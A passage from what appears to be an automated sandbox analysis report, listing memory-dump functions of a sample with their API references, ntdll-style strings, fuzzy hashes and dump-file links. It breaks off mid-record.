Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: d9f8b53cbdb167a09f59cb8f8c8b9964332fe5dffaba415fbdd47cf2a9479599
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: 0B81D230E052498EEF25CE6CC850BFEBFB5AF45321F984619D86BA7691C7708848CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 01969126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019C2559

Strings

@, xrefs: 01969175
$, xrefs: 01969191

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: de0ffaeef44d78812d2b5bc135e064250f84fd037e3368de8076261c11b8876b
Instruction ID: 058ddaf0ed9b296d6383fe5e05236208190334119a1dd5d485aa781c21c7bae6
Opcode Fuzzy Hash: de0ffaeef44d78812d2b5bc135e064250f84fd037e3368de8076261c11b8876b
Instruction Fuzzy Hash: F4811A75D00269DFDB31DB54CD44BEABAB8AF48714F0041EAAA0DB7240E7305E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019A4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019A49A4

Strings

0ITw, xrefs: 019A4A23
0ITw, xrefs: 019A4A03
X, xrefs: 019A49F0
0ITw, xrefs: 019A4A13

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0ITw$0ITw$0ITw$X
API String ID: 3446177414-1798417830
Opcode ID: 67e284e91613e454cc3ec3cf3279818e8cd6d238b1478fc7d9d5ea2353c9ba79
Instruction ID: ff3699b260931ef6b45c51a3c74c1f82a711d0680ac9c8ebd6f8e722e1de6ae1
Opcode Fuzzy Hash: 67e284e91613e454cc3ec3cf3279818e8cd6d238b1478fc7d9d5ea2353c9ba79
Instruction Fuzzy Hash: 98318F3590834AEBCF22DF58D844B8EBBA5BB88755F48401DFD089B241D3B49A56CF85

Uniqueness

Uniqueness Score: -1.00%

Function 01997B2F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01997B52
BaseThreadInitThunk.KERNEL32 ref: 01997B5C
RtlDebugPrintTimes.NTDLL ref: 019D49ED
RtlDebugPrintTimes.NTDLL ref: 019D4A70

Strings

DnL}(, xrefs: 019D4A12, 019D4A3D, 019D4A42

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID: DnL}(
API String ID: 4281723722-1712083521
Opcode ID: 4d28dc085c827f94afddabb3f7e8a11dbb5e1679f7561a1ad04d66120cb02caa
Instruction ID: 1ada4604a4e7868b287e00923b18f2fab0bc90bafbae83b0aa91a8280593203c
Opcode Fuzzy Hash: 4d28dc085c827f94afddabb3f7e8a11dbb5e1679f7561a1ad04d66120cb02caa
Instruction Fuzzy Hash: 31312775E04329EFCF25DFA8D885A9DBBB0BB88720F10812AE519B7294C7355901CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0198DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019CF611

Strings

, passed to %s, xrefs: 019CF662
Invalid heap signature for heap at %p, xrefs: 019CF653
RtlUnlockHeap, xrefs: 019CF65D

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: e52290947924b90c1a39f8d47e0f9f2c1e215341ba0af58b3b7d00a3e8d16a9b
Instruction ID: 9b1bacff4771273cfea6053f886b20ab74138b3030b22cfffb44ee470bd9f50f
Opcode Fuzzy Hash: e52290947924b90c1a39f8d47e0f9f2c1e215341ba0af58b3b7d00a3e8d16a9b
Instruction Fuzzy Hash: BA416571600345DFD722EF68C594B6AB7FAEF85B24F00846DE54E87391CB34A980C792

Uniqueness

Uniqueness Score: -1.00%

Function 019E4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019E4809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019E4888
LdrpCheckRedirection, xrefs: 019E488F
minkernel\ntdll\ldrredirect.c, xrefs: 019E4899

Memory Dump Source

Source File: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: c537687afecf361836be4b8c550097e76dee49b82416ecd35b31be15261e98d4
Instruction ID: bfab538392ddf3f6a6bf05aa36329b1dedd783caa190da966109cbde8cd7b86c
Opcode Fuzzy Hash: c537687afecf361836be4b8c550097e76dee49b82416ecd35b31be15261e98d4
Instruction Fuzzy Hash: 6F41CF32A443519BCB23CE6DD848A267BE9AF89A51F06066DED4DDB211D731EC00CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0198DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019CF757

Strings

, passed to %s, xrefs: 019CF7A8
Invalid heap signature for heap at %p, xrefs: 019CF799
RtlLockHeap, xrefs: 019CF7A3

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: 35115f9572854ef18ef07cc744bad3afb30ee2c21459abc9ba128df0d67f03dc
Instruction ID: 4983dbce6ea0ff3b815e35de864281fc8a99ea751fb75e28b38534d1183a5b33
Opcode Fuzzy Hash: 35115f9572854ef18ef07cc744bad3afb30ee2c21459abc9ba128df0d67f03dc
Instruction Fuzzy Hash: CF313931204784DFE727EB6CC519F5A7BE9EF41B14F044458E84E97692C7B8A880C752

Uniqueness

Uniqueness Score: -1.00%

Function 0195C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0195C0B4
RtlDebugPrintTimes.NTDLL ref: 019BD623
RtlDebugPrintTimes.NTDLL ref: 019BD651

Strings

$, xrefs: 0195C07C

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 02e08844c44fd23b08ca43a55dfd4b8d3db84b12a8b077abdf4e2b9b8c41b116
Instruction ID: ac02bcc2043548c1bc9b428f612570836867732a818452e7e624b09d96560931
Opcode Fuzzy Hash: 02e08844c44fd23b08ca43a55dfd4b8d3db84b12a8b077abdf4e2b9b8c41b116
Instruction Fuzzy Hash: BE116136A04318EBCF15AFA4E988ADD7B72FF85365F108519F82A6B2D0CB315A01CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0198EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b1fe542a8516ca8d0f5ee606842f8b5ac04715e8c868cb3079f78b89c380bb
Instruction ID: fbee5a1d3db8b681416fd66da9e335c8a9effe2eb825f0874ec7a61cd3318a8b
Opcode Fuzzy Hash: b4b1fe542a8516ca8d0f5ee606842f8b5ac04715e8c868cb3079f78b89c380bb
Instruction Fuzzy Hash: 38E11071D00608DFCF26EFA9C984A9DBBF5FF48315F24596AE54AA7261D730A841CF10

Uniqueness

Uniqueness Score: -1.00%

Function 019DEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019DEFE1
RtlDebugPrintTimes.NTDLL ref: 019DF009
RtlDebugPrintTimes.NTDLL ref: 019DF0AC
RtlDebugPrintTimes.NTDLL ref: 019DF160

Memory Dump Source

Source File: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d562b0d11d61dbe171a19cb5e789905a38f0c289e5bc32022582b359e727630a
Instruction ID: 386366627e99b6127f87184b839a960342a3b32d5dbfaab6a1f71a40cd8d04b6
Opcode Fuzzy Hash: d562b0d11d61dbe171a19cb5e789905a38f0c289e5bc32022582b359e727630a
Instruction Fuzzy Hash: 40713675E0021ADFDF05CFA8C985ADDBBF5BF48314F18802AE90AAB254D734A906CB54

Uniqueness

Uniqueness Score: -1.00%

Function 019DF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019DF26D
RtlDebugPrintTimes.NTDLL ref: 019DF292
RtlDebugPrintTimes.NTDLL ref: 019DF324
RtlDebugPrintTimes.NTDLL ref: 019DF378

Memory Dump Source

Source File: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4a695d0954886ed1691aec29742489681863982798ebf41eb55075d80c08a7e8
Instruction ID: f62f9af73592922f909ba6dabb7826034eedd66167238c3dad97ececbee7828b
Opcode Fuzzy Hash: 4a695d0954886ed1691aec29742489681863982798ebf41eb55075d80c08a7e8
Instruction Fuzzy Hash: A2514276E00219DFDF09CF98C846ADDBBF5BF48355F09812AE90AAB250D734A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 019659C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 019C0AA7

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6613f6c3eb75574561ab528314d70afd49eab9f364ecbcd6658c6e84da3c6625
Instruction ID: 859d792a18d324ec00e324b756d42317cd29e093d852faf60334ef1763d95a3c
Opcode Fuzzy Hash: 6613f6c3eb75574561ab528314d70afd49eab9f364ecbcd6658c6e84da3c6625
Instruction Fuzzy Hash: 36324770D0426ADFEB21CF68C884BEDBBB8BB58344F0485E9D54DA7241D7746A84CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 019A7E8B

Strings

+, xrefs: 019A7DE8
-, xrefs: 019A7DDD

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 9966dc61550d67f97404c53f0835ce16accbd841243be35f80874b2cd52280d8
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: A391C970E002169BDF28CF9DC882ABE7BADEF44322F94451AE95DE72D0D731994487D1

Uniqueness

Uniqueness Score: -1.00%

Function 0197D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0197D3A4

Strings

Bl, xrefs: 0197D48C
l, xrefs: 0197D46B

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: 3c87378344fc979a3e7b701ff9f37b9281fa8c39c454eb4dd263f1cb0d5a40a2
Instruction ID: 07acef4e4682d2ebe05224b2c6643a68069ab046c2c9ad3708c309ca4313e7a2
Opcode Fuzzy Hash: 3c87378344fc979a3e7b701ff9f37b9281fa8c39c454eb4dd263f1cb0d5a40a2
Instruction Fuzzy Hash: 0EA1B031A043299BEF31DB99C880BAAB7F5BF85714F0440E9D90DA7281DB74AE85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 019A5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 019A5E34

Strings

pow, xrefs: 019A5E0C, 019A5E29

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb78e31534ff01a8f4ccd2eca3584140caddc0b0cd50c7bb135f08ff17e00d1c
Instruction ID: fa98ca636d618e6b58bd7f51e1e1cc4ca36eed3728e635a7318add9c91fa057a
Opcode Fuzzy Hash: cb78e31534ff01a8f4ccd2eca3584140caddc0b0cd50c7bb135f08ff17e00d1c
Instruction Fuzzy Hash: B0515971B0C206A6FB12B61CC90176A3B98FB40751FE1CD58E19F8629DEA3494DDCBC6

Uniqueness

Uniqueness Score: -1.00%

Function 01994C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 01994C96
0, xrefs: 01994CC3

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 63a760a7d8da5dd1fb49fdb72c8f24299b7fd5a77db48ca79201fd89a43f72e0
Instruction ID: 2b41bc7c82e320375cdd9aa4c674c8d8177709377cbc37f03c542d1b1d35c763
Opcode Fuzzy Hash: 63a760a7d8da5dd1fb49fdb72c8f24299b7fd5a77db48ca79201fd89a43f72e0
Instruction Fuzzy Hash: 9F518AB5E002588FDF26CF9DC6846A9FBF8FF44316F54806AD04D9B255E770A986CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0198D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0198D959

Part of subcall function 01964859: RtlDebugPrintTimes.NTDLL ref: 019648F7

Strings

$, xrefs: 0198D86D
$, xrefs: 0198D900

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: f66e468dd6a67baca3f0ec79abf3971de47a5e4d56eb4a4ffb1ce07e7bc451c7
Instruction ID: b36d9ec01d413e0aff2967edba612d7e5912d9dc50dc96e7c026da0f08a27bc7
